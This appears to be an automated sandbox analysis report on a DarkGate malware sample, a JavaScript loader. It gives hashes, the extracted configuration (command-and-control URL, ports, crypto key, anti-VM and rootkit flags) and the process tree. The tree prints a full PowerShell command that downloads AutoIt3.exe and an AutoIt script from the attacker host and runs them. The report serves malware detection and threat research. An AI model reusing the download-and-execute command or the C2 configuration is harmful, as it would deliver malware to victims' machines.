Analysis
-
max time kernel
142s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20231023-en -
resource tags
arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system -
submitted
09-11-2023 14:18
Static task
static1
Behavioral task
behavioral1
Sample
app(060e45bf7b57d4).js
Resource
win7-20231023-en
General
-
Target
app(060e45bf7b57d4).js
-
Size
252KB
-
MD5
b428fd3b31d80dbdbbe4ee4949cfbe54
-
SHA1
3f39780bffd9b6b04dba52843622497606808020
-
SHA256
16613e7c07681726ab577e6ac14114cb42691838fa3c6c4c1bef7dafa2c7c4a0
-
SHA512
dd77e51e0d6c573d7fe7a3d5ac50b23fe0d81a3323ad89f80a8a3eadd61dc2cff9a6f86ea7632315ec3549e7528053b3634ebc8aec158a3023ca434ea85988c3
-
SSDEEP
6144:Fe7hgXeerjqlI2Iro+lJe7hgXeerjqlI2Iro+8:FIhgSlI23mJIhgSlI23V
Malware Config
Extracted
darkgate
ADS5
http://siliconerumble.com
-
alternative_c2_port
8080
-
anti_analysis
true
-
anti_debug
true
-
anti_vm
true
-
c2_port
443
-
check_disk
true
-
check_ram
true
-
check_xeon
false
-
crypter_au3
false
-
crypter_dll
false
-
crypter_rawstub
true
-
crypto_key
zSfdFmnnAquXKs
-
internal_mutex
txtMut
-
minimum_disk
32
-
minimum_ram
6003
-
ping_interval
4
-
rootkit
true
-
startup_persistence
true
-
username
ADS5
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 14 3348 powershell.exe 26 3348 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation wscript.exe -
Executes dropped EXE 1 IoCs
Processes:
AutoIt3.exepid process 4396 AutoIt3.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
AutoIt3.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AutoIt3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString AutoIt3.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepid process 3348 powershell.exe 3348 powershell.exe 3348 powershell.exe 3348 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3348 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
wscript.exepowershell.exedescription pid process target process PID 1596 wrote to memory of 3348 1596 wscript.exe powershell.exe PID 1596 wrote to memory of 3348 1596 wscript.exe powershell.exe PID 3348 wrote to memory of 4396 3348 powershell.exe AutoIt3.exe PID 3348 wrote to memory of 4396 3348 powershell.exe AutoIt3.exe PID 3348 wrote to memory of 4396 3348 powershell.exe AutoIt3.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\app(060e45bf7b57d4).js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1596 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://siliconerumble.com:443' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://siliconerumble.com:443/msitotdjhak' -OutFile 'totdjhak.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'totdjhak.au3'"; Stop-Process -Name "WScript"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3348 -
C:\tepp\AutoIt3.exe"C:\tepp\AutoIt3.exe" totdjhak.au33⤵
- Executes dropped EXE
- Checks processor information in registry
PID:4396
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
872KB
MD5c56b5f0201a3b3de53e561fe76912bfd
SHA12a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
-
Filesize
872KB
MD5c56b5f0201a3b3de53e561fe76912bfd
SHA12a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
-
Filesize
508KB
MD51df0df7aa48965762597452d418db3f3
SHA16b2137d66246ad3c994a28141736bc707c88184b
SHA25652a1722f0614e1c88473f4240ca1f5ac06d952159236014ef721598bc0889408
SHA51219dbca338a166d355f1d7ed05801e212995053df3805d53decd8898bdd84807a2b0b2d827c277909dd9dd9b5999886117a12812b1c1f05ea988a8a2c701aa39e